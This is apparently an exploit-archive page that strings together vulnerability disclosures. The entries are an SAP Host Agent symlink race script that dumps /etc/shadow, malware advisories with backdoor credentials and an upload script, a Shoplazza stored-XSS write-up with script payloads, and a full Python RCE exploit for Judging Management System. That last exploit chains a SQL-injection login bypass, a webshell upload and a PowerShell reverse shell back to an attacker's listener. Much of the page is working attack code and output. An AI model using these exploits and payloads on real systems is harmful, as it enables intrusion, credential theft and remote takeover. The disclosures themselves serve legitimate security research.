"[*] $COUNTER sec"<br /> rm -f /usr/sap/tmp/hwconfig_$HOST<br /> /usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf > /tmp/out 2>>/tmp/out &<br /> sleep "$COUNTER"s; ln -sf $TARGETFILE 
/usr/sap/tmp/hwconfig_$HOST #set symbolic link<br /> wait; rm -f /usr/sap/tmp/hwconfig_$HOST<br /> OUT=$(cat /tmp/out | grep -i "HW File")<br /> if [ -n "$OUT" ]<br /> then<br /> echo "[i] Final laps..."<br /> let "COUNTER-=1"<br /> else<br /> OUT=$(cat /tmp/out | grep -i "LINUX Configuration")<br /> let "COUNTER-=1"<br /> fi<br />done<br />echo "[+] Profit!"<br />ls -la $TARGETFILE && cat /tmp/out && rm -f /tmp/out<br />-----------------------------------------------------------------------<br /><br />This script exploits the vulnerability to obtain the contents of a file<br />specified as a command line argument. In the following example, the<br />/etc/shadow file containing password hashes of the system accounts is<br />retrieved.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ whoami<br />secadm<br /><br />secadm@sapsrv:~$ id<br />uid=1001(secadm) gid=493(sapsys) groups=493(sapsys),1001(sapinst)<br /><br />secadm@sapsrv:~$ ./saposcolrace /etc/shadow<br />-rw-r----- 1 root shadow 609 Feb 9 2021 /etc/shadow<br />[i] Racing....<br />[*] 10 sec<br />[*] 9 sec<br />[*] 8 sec<br />[*] 7 sec<br />[*] 6 sec<br />[*] 5 sec<br />[*] 4 sec<br />[*] 3 sec<br />[i] Final laps....<br />[*] 2 sec<br />[+] Profit!<br />-rw-r----- 1 root sapsys 609 Feb 9 2021 /etc/shadow<br />Webmethod returned successfully<br />-----------------------------------------------------------------------<br />Name = /usr/sap/tmp/hwconfig_sapsrv<br />Content<br />-----------------------------------------------------------------------<br />root:*:18516::::::<br />bin:*:18516::::::<br />daemon:*:18516::::::<br />[...]<br />-----------------------------------------------------------------------<br /><br /><br />3) UNIX Symlink Following and Race Condition in System Log Feature of<br /> saposcol<br /><br />The vulnerability can be verified by placing a malicious symlink and<br />querying the operating system logs via the stand-alone saposcol 
binary<br />as shown in the following listing.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/ossyslog_<host><br />secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saposcol -d<br />Collector > ask OsSysLog 10<br />-----------------------------------------------------------------------<br /><br />After execution, the file /etc/passwd containing essential user account<br />information is overwritten by system log information. The file is also<br />made readable only by users of the sapsys group. If the time period between<br />querying the operating system log and replacing the newly created report<br />file with a malicious symlink is chosen carefully (similar to the technique<br />shown in 2.), the targeted file can be made readable without corrupting it.<br /><br /><br />4) UNIX Symlink Following in Log File Creation of saposcol<br /><br />The vulnerability can be verified by placing a malicious symlink as<br />shown in the following listing.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/dev_coll<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/dev_coll.tmp<br />-----------------------------------------------------------------------<br /><br />After a restart of the main saposcol process, the file /etc/passwd containing<br />essential user account information is overwritten by log data.<br /><br /><br />5) UNIX Symlink Following in Shared Memory Dump File Creation<br /> of saposcol<br /><br />The vulnerability can be verified by placing a malicious symlink and stopping<br />the running saposcol process via the stand-alone saposcol binary as shown<br />in the following listing.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ ln -sf /etc/passwd /usr/sap/tmp/coll.put<br />secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saposcol -k<br 
/>-----------------------------------------------------------------------<br /><br />After termination of the main saposcol process, the file /etc/passwd<br />containing essential user account information is overwritten by current<br />data in the shared memory segment.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions of the binaries were found to be vulnerable<br />during our tests:<br /><br />- SAP Host Agent 721 (patch no. 42)<br /> SAPOSCOL version COLL 22.11 721 - v2.42 (patch no. 1214)<br />- SAP Host Agent 722 (patch no. 54)<br /> SAPOSCOL version COLL 22.11 722 - v2.49 (patch no. 1113)<br /><br />According to the vendor the following releases and versions<br />are affected by the discovered vulnerabilities:<br /><br />- SAPHOSTAGENT 7.22<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-02-22: Contacting vendor through vulnerability submission web form.<br />2022-02-23: Vendor confirms receipt and assigns internal ID #2280075571.<br />2022-03-02: Vendor asks for additional information on file system permissions.<br />2022-03-03: Providing required information via encrypted PGP mail.<br />2022-03-09: Vendor asks for additional information on file system permissions.<br />2022-03-10: Providing required information via encrypted PGP mail.<br />2022-03-30: Vendor accepts vulnerability and states that a fix is in progress.<br /> The initially submitted CVSS assessment 7.8 (LLLN|U|HHH) is disagreed<br /> with. A new vector string/score 6.7 (NLHN|U|LHH) is proposed by the<br /> vendor.<br />2022-04-04: Providing detailed explanation for initially submitted CVSS score<br /> and CVSS vector string. 
No answer received.<br />2022-06-14: Requesting update.<br />2022-06-28: Vendor informs that the security note is expected to be released at<br /> September Patchday 2022.<br />2022-09-10: Vendor informs about upcoming release of the patch and registration<br /> of CVE number.<br />2022-09-13: Vendor releases patch with SAP Security Note 3159736. The corresponding<br /> CVE possesses a CVSS vector string/score of 6.7 (NLHN|U|LHH).<br />2022-12-13: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br />Patches are available in the form of SAP Security Notes which can be accessed<br />via the SAP Customer Launchpad [1]. More information can also be found in<br />the Official SAP Security Patchday Blog [2].<br /><br />The following Security Note needs to be implemented: 3159736<br /><br />[1] https://launchpad.support.sap.com/#/securitynotes<br />[2] https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10<br /><br /><br />Workaround:<br />-----------<br />Remove write access to the DIR_PERF (e.g. /usr/sap/tmp) directory for the <sid>adm<br />account. Note that this change may interfere with other programs such as CCMS.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg / @2022<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5559e9f5e1645f8554ea020a29a5a3ee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Ransom.Win64.AtomSilo<br />Vulnerability: Crypto Logic Flaw<br />Family: AtomSilo<br />Type: PE64<br />MD5: 5559e9f5e1645f8554ea020a29a5a3ee<br />Vuln ID: MVID-2022-0666<br />Disclosure: 12/14/2022<br />Description: AtomSilo ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample.<br /><br />E.g. <br /><br />Test.exe.docx<br />Test.exe.pdf<br /><br />Tested successfully in a virtual machine environment.<br /><br /><br />PoC Video:<br />https://www.youtube.com/watch?v=xyBt9Ppb-xc<br /><br />Exploit/PoC:<br />Create files with ".exe" within the filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. 
All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.InCommander.17.b<br />Vulnerability: Hardcoded Cleartext Credentials<br />Family: InCommander<br />Type: PE32<br />MD5: dd76d8a5874bf8bf05279e35c68449ca<br />Vuln ID: MVID-2022-0665<br />Dropped files: incsrv.exe<br />Disclosure: 12/14/2022<br />Description: The malware listens on TCP ports 9400 and 9401 and requires authentication. However, the username "IncUser-b3" is stored in cleartext in a file named "incsrv.drv" under the Windows directory. The password "InClientMainPassword" is also stored in cleartext, but within the PE file "incsrv.exe" at offset 000958d0.<br /><br />Third-party adversaries may then upload their own executables using the FTP PASV and STOR commands.<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 9401<br />220 InCommad FTP Server ready.<br />USER IncUser-b3<br />331 Password required for IncUser-b3.<br />PASS InClientMainPassword<br />230 User IncUser-b3 logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,241,155).<br />CDUP \<br />250 CWD command successful. 
"C:/" is current directory.<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=61851<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting<br /># Exploit Author: Andrey Stoykov<br /># Software Link: https://github.com/Shoplazza/LifeStyle<br /># Version: 1.1<br /># Tested on: Ubuntu 20.04<br /><br /><br />Stored XSS #1:<br /><br />To reproduce do the following:<br /><br />1. Login as normal user account<br />2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"<br />3. Select "Title" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8<br />[...]<br /><br />{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]<br /><br /><br />// HTTP GET request to trigger XSS payload<br /><br />GET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=UTF-8<br />[...]<br /><br /><meta name="viewport" 
content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"><br /><title>Title"><script>alert(1)</script></title><br /><meta name="keywords" content="test1205"><br />[...]<br /><br /><br />Stored XSS #2:<br /><br />To reproduce do the following:<br /><br />1. Login as normal user account<br />2. Browse "Products" -> "Create Product"<br />3. Select "Subtitle" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />POST /admin/api/admin/v2_products HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"<p>Description</p>"[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8<br />[...]<br />{"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections<br />[...]<br /><br /><br />Stored XSS #3:<br /><br />To reproduce do the following:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement"<br />3. Select "Text" section and enter payload "><script>alert(1)</script><br />4. 
Select "Mobile Text" section and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />{"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...]<br /><br /><br /><br />Stored XSS #4:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" <br />3. Select "Subheading" and enter payload "><script>alert(1)</script><br />3. Select "Heading" and enter payload "><script>alert(1)</script><br />4. Select "Text" and enter payload "><script>alert(1)</script><br />5. Select "Button Text" and enter payload "><script>alert(1)</script><br />6. 
Select "Label" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>",<br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>"<br />[...]<br /><br /><br />Stored XSS #5:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" <br />3. Select "Heading" and enter payload "><script>alert(1)</script><br />4. 
Select "Description" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script><br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script><br />[...]<br /><br /><br /><br />Stored XSS #6:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping"<br />3. Select "Heading" and enter payload "><script>alert(1)</script><br />4. Select "Text" and enter payload "><script>alert(1)</script><br />5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping"<br />6. Select "Heading" and enter payload "><script>alert(1)</script><br />7. Select "Text" and enter payload "><script>alert(1)</script><br />8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount"<br />9. 
Select "Heading" and enter payload "><script>alert(1)</script><br />10. Select "Text" and enter payload "><script>alert(1)</script><br />11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon"<br />12. Select "Heading" and enter payload "><script>alert(1)</script><br />13. Select "Text" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>"<br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload <br /><br />HTTP/1.1 200 OK<br />Content-Type: 
application/json; charset=UTF-8<br />[...]<br />{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script><br />[...]<br /><br /><br />Stored XSS #7:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow"<br />3. 
Select "Title" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script><br />[...]<br /><br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>"<br />[...]<br /></code></pre>
<pre><code># Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)<br /># Date: 12/11/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 on XAAMP server<br /><br /><br />import requests,argparse,re,time,base64<br />import urllib.parse<br />from colorama import (Fore as F,Back as B,Style as S)<br />from bs4 import BeautifulSoup<br /><br /><br />BANNER = """<br />╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗<br />║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║<br />╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝<br /><br />"""<br /><br />def argsetup():<br /> desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'<br /> parser = argparse.ArgumentParser(description=desc)<br /> parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)<br /> parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)<br /> parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)<br /> args = parser.parse_args()<br /> return args<br /><br /># Performs Auth bypass in order to get the admin cookie<br />def auth_bypass(args):<br /> print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")<br /> session = requests.Session()<br /> loginUrl = f"{args.target}/login.php"<br /><br /> username = """' OR 1=1-- -"""<br /> password = "randomvalue1234"<br /> data = {'username': username, 'password': password}<br /><br /> login = 
session.post(loginUrl,verify=False,data=data)<br /> admin_cookie = login.cookies['PHPSESSID']<br /> print(F.GREEN+"[+] Admin cookies obtained !!!")<br /> return admin_cookie<br /><br /># Checks if the file has been uploaded to /uploads directory<br />def check_file(args,cookie):<br /> uploads_endpoint = f"{args.target}/uploads/"<br /> cookies = {'PHPSESSID': f'{cookie}'}<br /> req = requests.get(uploads_endpoint,verify=False,cookies=cookies)<br /> soup = BeautifulSoup(req.text,features='html.parser')<br /> files = soup.find_all("a")<br /> for i in range (len(files)):<br /> match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))<br /> if match:<br /> file = files[i].get('href')<br /> print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)<br /> return file<br /> <br /> <br /> return None<br /><br />def file_upload(args,cookie):<br /> now = int(time.time())<br /> endpoint = f"{args.target}/edit_organizer.php"<br /> cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}<br /> get_req = requests.get(endpoint,verify=False,cookies=cookies)<br /> soup = BeautifulSoup(get_req.text,features='html.parser')<br /> username = soup.find("input",{"name":"username"}).get('value')<br /> admin_password = soup.find("input",{"id":"password"}).get('value')<br /> print(F.GREEN + "[+] Admin username: " + username)<br /> print(F.GREEN + "[+] Admin password: " + admin_password)<br /> <br /> <br /> # Multi-part request<br /> file_dict = {<br /> 'fname':(None,"Random"),<br /> 'mname':(None,"Random"),<br /> 'lname':(None,"Random"),<br /> 'email':(None,"ranom@mail.com"),<br /> 'pnum':(None,"014564343"),<br /> 'cname':(None,"Random"),<br /> 'caddress':(None,"Random"),<br /> 'ctelephone':(None,"928928392"),<br /> 'cemail':(None,"company@mail.com"),<br /> 'cwebsite':(None,"http://company.com"),<br /> 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),<br /> 
'username':(None,f"{admin_password}"),<br /> 'passwordx':(None,f"{admin_password}"),<br /> 'password2x':(None,f"{admin_password}"),<br /> 'password':(None,f"{admin_password}"),<br /> 'update':(None,"")<br /> }<br /> <br /> req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)<br /><br /><br />def exploit(args,cookie,file):<br /> payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """<br /> uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"<br /> cookies = {'PHPSESSID': f'{cookie}'}<br /> print(F.GREEN + "\n[+] Enjoy your reverse shell ")<br /> requests.get(uploads_endpoint,verify=False,cookies=cookies)<br /> <br /> <br /><br />if __name__ == '__main__':<br /> print(F.CYAN + BANNER)<br /> args = argsetup()<br /> cookie=auth_bypass(args=args)<br /> file_upload(args=args,cookie=cookie)<br /> file_name=check_file(args=args,cookie=cookie)<br /> if file_name is not None:<br /> exploit(args=args,cookie=cookie,file=file_name)<br /> <br /> else:<br /> print(F.RED + "[!] File not found")<br /> <br /></code></pre>
